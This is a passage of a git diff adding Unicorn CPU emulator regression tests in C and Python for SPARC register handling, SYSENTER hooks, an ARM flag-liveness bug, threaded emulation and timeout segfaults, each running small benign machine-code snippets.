0: 1; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill2.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill2.c new file mode 100644 index 0000000..8e6ad56 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sigill2.c @@ -0,0 +1,28 @@ +#include +#include +#include +#include + +#define UC_BUG_WRITE_SIZE 128 +#define UC_BUG_WRITE_ADDR 0x2000 + +int main() +{ + int size; + uc_engine *uc; + + uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + fprintf (stderr, "Cannot initialize unicorn\n"); + return 1; + } + size = UC_BUG_WRITE_SIZE; + if (!uc_mem_map (uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { + uc_mem_write (uc, UC_BUG_WRITE_ADDR, + (const uint8_t*)"\xff\xff\xff\xff\xff\xff\xff\xff", 8); + } + err = uc_emu_start(uc, UC_BUG_WRITE_ADDR, UC_BUG_WRITE_ADDR+8, 0, 1); + uc_close(uc); + printf ("Error = %u (%s)\n", err, uc_strerror(err)); + return err? -1: 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc64.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc64.py new file mode 100644 index 0000000..3430763 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc64.py @@ -0,0 +1,24 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.sparc_const import * + +PAGE_SIZE = 1 * 1024 * 1024 + +uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN) +uc.reg_write(UC_SPARC_REG_SP, 100) +print 'writing sp = 100' + + # 0: b0 06 20 01 inc %i0 + # 4: b2 06 60 01 inc %i1 + +CODE = "\xb0\x06\x20\x01" \ + "\xb2\x06\x60\x01" + +uc.mem_map(0, PAGE_SIZE) +uc.mem_write(0, CODE) +uc.emu_start(0, len(CODE), 0, 2) + +print 'sp =', uc.reg_read(UC_SPARC_REG_SP) +print 'i0 =', uc.reg_read(UC_SPARC_REG_I0) +print 'i1 =', uc.reg_read(UC_SPARC_REG_I1) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_jump_to_zero.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_jump_to_zero.c new file mode 100644 index 0000000..538405f 
--- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_jump_to_zero.c @@ -0,0 +1,27 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_SPARC +#define HARDWARE_MODE UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN + +#define MEMORY_STARTING_ADDRESS 0x1000000 +#define MEMORY_SIZE 2 * 1024 * 1024 +#define MEMORY_PERMISSIONS UC_PROT_ALL + +#define BINARY_CODE "\x02\xbc\x00\x00" + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_reg.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_reg.py new file mode 100644 index 0000000..3d55065 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sparc_reg.py @@ -0,0 +1,205 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.sparc_const import * + +PAGE_SIZE = 1 * 1024 * 1024 + +uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) +uc.reg_write(UC_SPARC_REG_SP, 100) +uc.reg_write(UC_SPARC_REG_FP, 200) + + # 0x0: \x80\x00\x20\x01 add %g0, 1, %g0 + # 0x4: \x82\x00\x60\x01 add %g1, 1, %g1 + # 0x8: \x84\x00\xA0\x01 add %g2, 1, %g2 + # 0xc: \x86\x00\xE0\x01 add %g3, 1, %g3 + # 0x10: \x88\x01\x20\x01 add %g4, 1, %g4 + # 0x14: \x8A\x01\x60\x01 add %g5, 1, %g5 + # 0x18: \x8C\x01\xA0\x01 add %g6, 1, %g6 + # 0x1c: \x8E\x01\xE0\x01 add %g7, 1, %g7 + # 0x20: \x90\x02\x20\x01 add %o0, 1, %o0 + # 0x24: \x92\x02\x60\x01 add %o1, 1, %o1 + # 0x28: \x94\x02\xA0\x01 add %o2, 1, %o2 + # 0x2c: \x96\x02\xE0\x01 add %o3, 
1, %o3 + # 0x30: \x98\x03\x20\x01 add %o4, 1, %o4 + # 0x34: \x9A\x03\x60\x01 add %o5, 1, %o5 + # 0x38: \x9C\x03\xA0\x01 add %sp, 1, %sp + # 0x3c: \x9E\x03\xE0\x01 add %o7, 1, %o7 + # 0x40: \xA0\x04\x20\x01 add %l0, 1, %l0 + # 0x44: \xA2\x04\x60\x01 add %l1, 1, %l1 + # 0x48: \xA4\x04\xA0\x01 add %l2, 1, %l2 + # 0x4c: \xA6\x04\xE0\x01 add %l3, 1, %l3 + # 0x50: \xA8\x05\x20\x01 add %l4, 1, %l4 + # 0x54: \xAA\x05\x60\x01 add %l5, 1, %l5 + # 0x58: \xAC\x05\xA0\x01 add %l6, 1, %l6 + # 0x5c: \xAE\x05\xE0\x01 add %l7, 1, %l7 + # 0x0: \xB0\x06\x20\x01 add %i0, 1, %i0 + # 0x4: \xB2\x06\x60\x01 add %i1, 1, %i1 + # 0x8: \xB4\x06\xA0\x01 add %i2, 1, %i2 + # 0xc: \xB6\x06\xE0\x01 add %i3, 1, %i3 + # 0x10: \xB8\x07\x20\x01 add %i4, 1, %i4 + # 0x14: \xBA\x07\x60\x01 add %i5, 1, %i5 + # 0x18: \xBC\x07\xA0\x01 add %fp, 1, %fp + # 0x1c: \xBE\x07\xE0\x01 add %i7, 1, %i7 + + +CODE = "\x80\x00\x20\x01" \ + "\x82\x00\x60\x01" \ + "\x84\x00\xA0\x01" \ + "\x86\x00\xE0\x01" \ + "\x88\x01\x20\x01" \ + "\x8A\x01\x60\x01" \ + "\x8C\x01\xA0\x01" \ + "\x8E\x01\xE0\x01" \ + "\x90\x02\x20\x01" \ + "\x92\x02\x60\x01" \ + "\x94\x02\xA0\x01" \ + "\x96\x02\xE0\x01" \ + "\x98\x03\x20\x01" \ + "\x9A\x03\x60\x01" \ + "\x9C\x03\xA0\x01" \ + "\x9E\x03\xE0\x01" \ + "\xA0\x04\x20\x01" \ + "\xA2\x04\x60\x01" \ + "\xA4\x04\xA0\x01" \ + "\xA6\x04\xE0\x01" \ + "\xA8\x05\x20\x01" \ + "\xAA\x05\x60\x01" \ + "\xAC\x05\xA0\x01" \ + "\xAE\x05\xE0\x01" \ + "\xB0\x06\x20\x01" \ + "\xB2\x06\x60\x01" \ + "\xB4\x06\xA0\x01" \ + "\xB6\x06\xE0\x01" \ + "\xB8\x07\x20\x01" \ + "\xBA\x07\x60\x01" \ + "\xBC\x07\xA0\x01" \ + "\xBE\x07\xE0\x01" + + +uc.mem_map(0, PAGE_SIZE) +uc.mem_write(0, CODE) +uc.emu_start(0, len(CODE), 0, 32) + +def print_registers(mu): + g0 = mu.reg_read(UC_SPARC_REG_G0) + g1 = mu.reg_read(UC_SPARC_REG_G1) + g2 = mu.reg_read(UC_SPARC_REG_G2) + g3 = mu.reg_read(UC_SPARC_REG_G3) + g4 = mu.reg_read(UC_SPARC_REG_G4) + g5 = mu.reg_read(UC_SPARC_REG_G5) + g6 = mu.reg_read(UC_SPARC_REG_G6) + g7 = 
mu.reg_read(UC_SPARC_REG_G7) + + o0 = mu.reg_read(UC_SPARC_REG_O0) + o1 = mu.reg_read(UC_SPARC_REG_O1) + o2 = mu.reg_read(UC_SPARC_REG_O2) + o3 = mu.reg_read(UC_SPARC_REG_O3) + o4 = mu.reg_read(UC_SPARC_REG_O4) + o5 = mu.reg_read(UC_SPARC_REG_O5) + o6 = mu.reg_read(UC_SPARC_REG_O6) + o7 = mu.reg_read(UC_SPARC_REG_O7) + + l0 = mu.reg_read(UC_SPARC_REG_L0) + l1 = mu.reg_read(UC_SPARC_REG_L1) + l2 = mu.reg_read(UC_SPARC_REG_L2) + l3 = mu.reg_read(UC_SPARC_REG_L3) + l4 = mu.reg_read(UC_SPARC_REG_L4) + l5 = mu.reg_read(UC_SPARC_REG_L5) + l6 = mu.reg_read(UC_SPARC_REG_L6) + l7 = mu.reg_read(UC_SPARC_REG_L7) + + i0 = mu.reg_read(UC_SPARC_REG_I0) + i1 = mu.reg_read(UC_SPARC_REG_I1) + i2 = mu.reg_read(UC_SPARC_REG_I2) + i3 = mu.reg_read(UC_SPARC_REG_I3) + i4 = mu.reg_read(UC_SPARC_REG_I4) + i5 = mu.reg_read(UC_SPARC_REG_I5) + i6 = mu.reg_read(UC_SPARC_REG_I6) + i7 = mu.reg_read(UC_SPARC_REG_I7) + + pc = mu.reg_read(UC_SPARC_REG_PC) + sp = mu.reg_read(UC_SPARC_REG_SP) + fp = mu.reg_read(UC_SPARC_REG_FP) + print(" G0 = %d" % g0) + print(" G1 = %d" % g1) + print(" G2 = %d" % g2) + print(" G3 = %d" % g3) + print(" G4 = %d" % g4) + print(" G5 = %d" % g5) + print(" G6 = %d" % g6) + print(" G7 = %d" % g7) + print("") + print(" O0 = %d" % o0) + print(" O1 = %d" % o1) + print(" O2 = %d" % o2) + print(" O3 = %d" % o3) + print(" O4 = %d" % o4) + print(" O5 = %d" % o5) + print(" O6 = %d" % o6) + print(" O7 = %d" % o7) + print("") + print(" L0 = %d" % l0) + print(" L1 = %d" % l1) + print(" L2 = %d" % l2) + print(" L3 = %d" % l3) + print(" L4 = %d" % l4) + print(" L5 = %d" % l5) + print(" L6 = %d" % l6) + print(" L7 = %d" % l7) + print("") + print(" I0 = %d" % i0) + print(" I1 = %d" % i1) + print(" I2 = %d" % i2) + print(" I3 = %d" % i3) + print(" I4 = %d" % i4) + print(" I5 = %d" % i5) + print(" I6 = %d" % i6) + print(" I7 = %d" % i7) + print("") + print(" PC = %d" % pc) + print(" SP = %d" % sp) + print(" FP = %d" % fp) + print("") + +print_registers(uc) + +assert 
uc.reg_read(UC_SPARC_REG_PC) == 132 # make sure we executed all instructions +assert uc.reg_read(UC_SPARC_REG_SP) == 101 +assert uc.reg_read(UC_SPARC_REG_FP) == 201 + +assert uc.reg_read(UC_SPARC_REG_G0) == 0 # G0 is always zero +assert uc.reg_read(UC_SPARC_REG_G1) == 1 +assert uc.reg_read(UC_SPARC_REG_G2) == 1 +assert uc.reg_read(UC_SPARC_REG_G3) == 1 +assert uc.reg_read(UC_SPARC_REG_G4) == 1 +assert uc.reg_read(UC_SPARC_REG_G5) == 1 +assert uc.reg_read(UC_SPARC_REG_G6) == 1 +assert uc.reg_read(UC_SPARC_REG_G7) == 1 + +assert uc.reg_read(UC_SPARC_REG_O0) == 1 +assert uc.reg_read(UC_SPARC_REG_O1) == 1 +assert uc.reg_read(UC_SPARC_REG_O2) == 1 +assert uc.reg_read(UC_SPARC_REG_O3) == 1 +assert uc.reg_read(UC_SPARC_REG_O4) == 1 +assert uc.reg_read(UC_SPARC_REG_O5) == 1 +assert uc.reg_read(UC_SPARC_REG_O6) == 101 +assert uc.reg_read(UC_SPARC_REG_O7) == 1 + +assert uc.reg_read(UC_SPARC_REG_L0) == 1 +assert uc.reg_read(UC_SPARC_REG_L1) == 1 +assert uc.reg_read(UC_SPARC_REG_L2) == 1 +assert uc.reg_read(UC_SPARC_REG_L3) == 1 +assert uc.reg_read(UC_SPARC_REG_L4) == 1 +assert uc.reg_read(UC_SPARC_REG_L5) == 1 +assert uc.reg_read(UC_SPARC_REG_L6) == 1 +assert uc.reg_read(UC_SPARC_REG_L7) == 1 + +assert uc.reg_read(UC_SPARC_REG_I0) == 1 +assert uc.reg_read(UC_SPARC_REG_I1) == 1 +assert uc.reg_read(UC_SPARC_REG_I2) == 1 +assert uc.reg_read(UC_SPARC_REG_I3) == 1 +assert uc.reg_read(UC_SPARC_REG_I4) == 1 +assert uc.reg_read(UC_SPARC_REG_I5) == 1 +assert uc.reg_read(UC_SPARC_REG_I6) == 201 +assert uc.reg_read(UC_SPARC_REG_I7) == 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/sysenter_hook_x86.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sysenter_hook_x86.c new file mode 100644 index 0000000..7cf7b7c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/sysenter_hook_x86.c @@ -0,0 +1,60 @@ +#include + +// code to be emulated +#define X86_CODE32 "\x0F\x34" // SYSENTER + +// memory address where emulation starts +#define ADDRESS 
0x1000000 + +int got_sysenter = 0; + +void sysenter (uc_engine *uc, void *user) { + printf ("SYSENTER hook called.\n"); + got_sysenter = 1; +} + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook sysenterHook; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + // Hook the SYSENTER instructions + if (uc_hook_add (uc, &sysenterHook, UC_HOOK_INSN, sysenter, NULL, 1, 0, UC_X86_INS_SYSENTER) != UC_ERR_OK) { + printf ("Cannot hook SYSENTER instruction\n."); + return -1; + } + + // emulate code in infinite time & unlimited instructions + err=uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + printf("Emulation done.\n"); + uc_close(uc); + + if (!got_sysenter) { + printf ("[!] 
ERROR : SYSENTER hook not called.\n"); + return -1; + } + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/tcg_liveness_analysis_bug_issue-287.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/tcg_liveness_analysis_bug_issue-287.py new file mode 100644 index 0000000..4310a8c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/tcg_liveness_analysis_bug_issue-287.py @@ -0,0 +1,134 @@ +from unicorn import * +from unicorn.arm_const import * +import binascii + +MB = 1024 * 1024 +PAGE = 4 * 1024 + +def PrintArmRegisters(uc_emu): + print 'R0 : '+hex(uc_emu.reg_read(UC_ARM_REG_R0)) + print 'R1 : '+hex(uc_emu.reg_read(UC_ARM_REG_R1)) + print 'R2 : '+hex(uc_emu.reg_read(UC_ARM_REG_R2)) + print 'R3 : '+hex(uc_emu.reg_read(UC_ARM_REG_R3)) + print 'R4 : '+hex(uc_emu.reg_read(UC_ARM_REG_R4)) + print 'R5 : '+hex(uc_emu.reg_read(UC_ARM_REG_R5)) + print 'R6 : '+hex(uc_emu.reg_read(UC_ARM_REG_R6)) + print 'R7 : '+hex(uc_emu.reg_read(UC_ARM_REG_R7)) + print 'R8 : '+hex(uc_emu.reg_read(UC_ARM_REG_R8)) + print 'R9 : '+hex(uc_emu.reg_read(UC_ARM_REG_R9)) + print 'R10 : '+hex(uc_emu.reg_read(UC_ARM_REG_R10)) + print 'R11 : '+hex(uc_emu.reg_read(UC_ARM_REG_R11)) + print 'R12 : '+hex(uc_emu.reg_read(UC_ARM_REG_R12)) + print 'SP : '+hex(uc_emu.reg_read(UC_ARM_REG_SP)) + print 'LR : '+hex(uc_emu.reg_read(UC_ARM_REG_LR)) + print 'PC : '+hex(uc_emu.reg_read(UC_ARM_REG_PC)) + flags = uc_emu.reg_read(UC_ARM_REG_CPSR) + print 'carry : '+str(flags >> 29 & 0x1) + print 'overflow : '+str(flags >> 28 & 0x1) + print 'negative : '+str(flags >> 31 & 0x1) + print 'zero : '+str(flags >> 30 & 0x1) + +''' + issue #287 + Initial Register States: R0=3, R1=24, R2=16, R3=0 + ----- code start ----- + CMP R0,R1,LSR#3 + SUBCS R0,R0,R1,LSR#3 # CPU flags got changed in these two instructions, and *REMEMBERED*, now NF == VF == 0 + CMP R0,#1 # CPU flags changed again, now NF == 1, VF == 0, but they are not properly *REMEMBERED* + MOV R1,R1,LSR#4 + SUBGES 
R2,R2,#4 # according to the result of CMP, we should skip this op + + MOVGE R3,#100 # since changed flags are not *REMEMBERED* in CMP, now NF == VF == 0, which result in wrong branch + # at the end of this code block, should R3 == 0 + ----- code end ------ + + # TCG ops are correct, plain op translation is done correctly, + # but there're In-Memory bits invisible from ops that control the host code generation. + # all these codes are in one TCG translation-block, so wrong things could happen. + # detail explanation is given on the right side. + # remember, both set_label and brcond are point to refresh the dead_temps and mem_temps states in TCG + ----- TCG ops ------ + ld_i32 tmp5,env,$0xfffffffffffffff4 + movi_i32 tmp6,$0x0 + brcond_i32 tmp5,tmp6,ne,$0x0 + mov_i32 tmp5,r1 ------------------------- + movi_i32 tmp6,$0x3 | + shr_i32 tmp5,r1,tmp6 | + mov_i32 tmp6,r0 | + sub_i32 NF,r0,tmp5 | + mov_i32 ZF,NF | + setcond_i32 CF,r0,tmp5,geu | # This part is "CMP R0,R1,LSR#3" + xor_i32 VF,NF,r0 |-----> # and "SUBCS R0,R0,R1,LSR#3" + xor_i32 tmp7,r0,tmp5 | # the last op in this block, set_label get a chance to refresh the TCG globals memory states, + and_i32 VF,VF,tmp7 | # so things get back to normal states + mov_i32 tmp6,NF | # these codes are not affected by the bug. Let's called this Part-D + movi_i32 tmp5,$0x0 | + brcond_i32 CF,tmp5,eq,$0x1 | + mov_i32 tmp5,r1 | + movi_i32 tmp6,$0x3 | + shr_i32 tmp5,r1,tmp6 | + mov_i32 tmp6,r0 | + sub_i32 tmp6,r0,tmp5 | + mov_i32 r0,tmp6 | + set_label $0x1 ------------------------- + movi_i32 tmp5,$0x1 ----------------- # Let's called this Part-C + mov_i32 tmp6,r0 | # NF is used as output operand again! + sub_i32 NF,r0,tmp5 ----------------|-----> # but it is stated as Not-In-Memory, + mov_i32 ZF,NF | # no need to sync it after calculation. + setcond_i32 CF,r0,tmp5,geu | # the generated host code does not write NF + xor_i32 VF,NF,r0 | # back to its memory location, hence forgot. And the CPU flags after this calculation is not changed. 
+ xor_i32 tmp7,r0,tmp5 | # Caution: the following SUBGES's condition check is right, even though the generated host code does not *REMEMBER* NF, it will cache the calculated result and serve SUBGES correctly + and_i32 VF,VF,tmp7 | + mov_i32 tmp6,NF | + mov_i32 tmp5,r1 | # this part is "CMP R0,#1" + movi_i32 tmp6,$0x4 | # and "MOV R1,R1,LSR#4" + shr_i32 tmp5,r1,tmp6 | # and "SUBGES R2,R2,#4" + mov_i32 r1,tmp5 |-----> # This is the part where problem start to arise + xor_i32 tmp5,VF,NF | + movi_i32 tmp6,$0x0 | + brcond_i32 tmp5,tmp6,lt,$0x2 --------|-----> # QEMU will refresh the InMemory bit for TCG globals here, but Unicorn won't + movi_i32 tmp5,$0x4 | + mov_i32 tmp6,r2 | # this is the 1st bug-related op get analyzed. + sub_i32 NF,r2,tmp5 ----------------|-----> # here, NF is an output operand, it's flagged dead + mov_i32 ZF,NF | # and the InMemory bit is clear, tell the previous(above) ops + setcond_i32 CF,r2,tmp5,geu | # if it is used as output operand again, do not sync it + xor_i32 VF,NF,r2 | # so the generated host-code for previous ops will not write it back to Memory + xor_i32 tmp7,r2,tmp5 | # Caution: the CPU flags after this calculation is also right, because the set_label is a point of refresh, make them *REMEMBERED* + and_i32 VF,VF,tmp7 | # Let's call this Part-B + mov_i32 tmp6,NF | + mov_i32 r2,ZF | + set_label $0x2 ----------------- + xor_i32 tmp5,VF,NF ----------------- + movi_i32 tmp6,$0x0 | + brcond_i32 tmp5,tmp6,lt,$0x3 | # Let's call this Part-A + movi_i32 tmp5,$0x64 | # if Part-B is not skipped, this part won't go wrong, because we'll check the CPU flags as the result of Part-B, it's *REMEMBERED* + movi_i32 r3,$0x64 |-----> # but if Part-B is skipped, + set_label $0x3 | # what should we expected? we will check the condition based on the result of Part-D!!! + call wfi,$0x0,$0,env | # because result of Part-C is lost. this is why things go wrong. 
+ set_label $0x0 | + exit_tb $0x7f6401714013 ----------------- + ########### + ----- TCG ends ------ +''' + +TestCode = b'\xa1\x01\x50\xe1\xa1\x01\x40\x20\x01\x00\x50\xe3\x21\x12\xa0\xe1\x04\x20\x52\xa2\x64\x30\xa0\xa3' + +def UseUcToEmulate(): + try: + uc_emu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + #if LoadCode(uc_emu, 2*MB, 0x9004): + uc_emu.mem_map(0, 2*MB) + uc_emu.reg_write(UC_ARM_REG_SP, 0x40000) + uc_emu.reg_write(UC_ARM_REG_R0, 3) + uc_emu.reg_write(UC_ARM_REG_R1, 24) + uc_emu.reg_write(UC_ARM_REG_R2, 16) + uc_emu.mem_write(0, TestCode) + uc_emu.emu_start(0, 24) + PrintArmRegisters(uc_emu) + + except UcError as e: + print("ERROR: %s" % e) + PrintArmRegisters(uc_emu) + + +UseUcToEmulate() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/threaded_emu_start.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/threaded_emu_start.c new file mode 100644 index 0000000..05776d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/threaded_emu_start.c @@ -0,0 +1,241 @@ +/* +Test for uc_open() and uc_emu_start() being called by different threads. + +This code will call uc_open() in the main thread and then attempt +to call uc_emu_start() from its own thread. This would enable the emulator +to run in the background while you do other things like handle user interface +etc in the foreground. + +Currently "uc->qemu_global_mutex" is locked by uc_open() and unlocked +by uc_emu_start(). This is a problem because the mutex implementation +must be locked and unlocked by the same thread. This means that uc_open() +and uc_emu_start() must be executed in the same thread. This is an unnecessary +limitation which prevents the emulator from being able to be executed in the +background. 
+*/ + +// windows specific +#ifdef _MSC_VER +#include +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#include "pthread.h" +#endif // _MSC_VER + +// for win32 threads in mingw +#ifdef _WIN32 +#include +#endif + +// common includes +#include + + +// Test MIPS little endian code. +// This should loop forever. +const uint64_t addr = 0x100000; +const unsigned char loop_test_code[] = { + 0x02,0x00,0x04,0x24, // 100000: li $a0, 2 + // loop1 + 0x00,0x00,0x00,0x00, // 100004: nop + 0xFE,0xFF,0x80,0x14, // 100008: bnez $a0, loop1 + 0x00,0x00,0x00,0x00, // 10000C: nop +}; +bool test_passed_ok = false; +int loop_count = 0; + + +// This hook is used to show that code is executing in the emulator. +static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf("Code: %"PRIx64"\n", address); +} + + +typedef struct { + uc_engine *uc; + uint64_t startAddr; + uint64_t endAddr; +} EmuStarterParam_t; + +// This is a thread that just runs uc_emu_start() in it. +// The code that it is executing in this case will run forever until it is stopped by uc_emu_stop(). 
+static uc_err emu_starter(void* param) +{ + uc_engine *uc; + uint64_t start_addr; + uint64_t end_addr; + uc_err err; + + EmuStarterParam_t* starter_params = (EmuStarterParam_t *)param; + uc = starter_params->uc; + start_addr = starter_params->startAddr; + end_addr = starter_params->endAddr; + + printf("uc_emu_start()\n"); + err = uc_emu_start(uc, start_addr, end_addr, 0, 0); + if (err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + return err; +} + +#ifdef _WIN32 +static unsigned int __stdcall win32_emu_starter(void* param) +{ + uc_err err = emu_starter(param); + _endthreadex(err); + return err; +} +#else +static void* posix_emu_starter(void* param) +{ + uc_err err = emu_starter(param); + return (void*)err; +} +#endif + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + int ret; + uc_hook hhc; + uint32_t val; + EmuStarterParam_t starter_params; +#ifdef _WIN32 + HANDLE th = (HANDLE)-1; +#else + pthread_t th; +#endif + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + printf("uc_open()\n"); + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + printf("uc_mem_map()\n"); + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // write machine code to be emulated to memory + printf("uc_mem_write()\n"); + err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + printf("uc_hook_add()\n"); + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on 
uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + + // start background thread + printf("---- Thread Starting ----\n"); + starter_params.uc = uc; + starter_params.startAddr = addr; + starter_params.endAddr = addr + sizeof(loop_test_code); + +#ifdef _WIN32 + // create thread + th = (HANDLE)_beginthreadex(NULL, 0, win32_emu_starter, &starter_params, CREATE_SUSPENDED, NULL); + if(th == (HANDLE)-1) + { + printf("Failed on _beginthreadex() with error returned: %p\n", _errno()); + return -1; + } + // start thread + ret = ResumeThread(th); + if( ret == -1 ) + { + printf("Failed on ResumeThread() with error returned: %p\n", _errno()); + return -2; + } + // wait 3 seconds + Sleep(3 * 1000); +#else + // add posix code to start the emu_starter() thread + ret = pthread_create(&th, NULL, posix_emu_starter, &starter_params); + if( ret ) + { + printf("Failed on pthread_create() with error returned: %u\n", err); + return -2; + } + // wait 3 seconds + sleep(3); +#endif + + + // Stop the thread after it has been let to run in the background for a while + printf("---- Thread Stopping ----\n"); + printf("uc_emu_stop()\n"); + err = uc_emu_stop(uc); + if( err ) + { + printf("Failed on uc_emu_stop() with error returned: %u\n", err); + return err; + } + test_passed_ok = true; + + + // done executing, print some reg values as a test + uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); + uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + + // free resources + printf("uc_close()\n"); + uc_close(uc); + + if( test_passed_ok ) + printf("\n\nTEST PASSED!\n\n"); + else + printf("\n\nTEST FAILED!\n\n"); + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/timeout_segfault.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/timeout_segfault.c new file mode 100644 index 0000000..43abde0 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/timeout_segfault.c @@ -0,0 +1,147 @@ +/* +timeout_segfault.c + +This program shows a case where the emulation timer keeps running after +emulation has ended. It triggers an intermittent segfault when _timeout_fn() +tries to call uc_emu_stop() after emulation has already been cleaned up. This +code is the same as samples/sample_arm.c, except that it adds a timeout on each +call to uc_emu_start(). See issue #78 for more details: +https://github.com/unicorn-engine/unicorn/issues/78 +*/ + +#include + + +// code to be emulated +#define ARM_CODE "\x37\x00\xa0\xe3\x03\x10\x42\xe0" // mov r0, #0x37; sub r1, r2, r3 +#define THUMB_CODE "\x83\xb0" // sub sp, #0xc + +// memory address where emulation starts +#define ADDRESS 0x10000 + +// number of seconds to wait before timeout +#define TIMEOUT 5 + +static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf(">>> Tracing basic block at 0x%"PRIx64 ", block size = 0x%x\n", address, size); +} + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size); +} + +static void test_arm(void) +{ + uc_engine *uc; + uc_err err; + uc_hook trace1, trace2; + + int r0 = 0x1234; // R0 register + int r2 = 0x6789; // R1 register + int r3 = 0x3333; // R2 register + int r1; // R1 register + + printf("Emulate ARM code\n"); + + // Initialize emulator in ARM mode + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u (%s)\n", + err, uc_strerror(err)); + return; + } + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + uc_mem_write(uc, ADDRESS, ARM_CODE, sizeof(ARM_CODE) - 1); + + // initialize machine registers + uc_reg_write(uc, UC_ARM_REG_R0, &r0); + uc_reg_write(uc, 
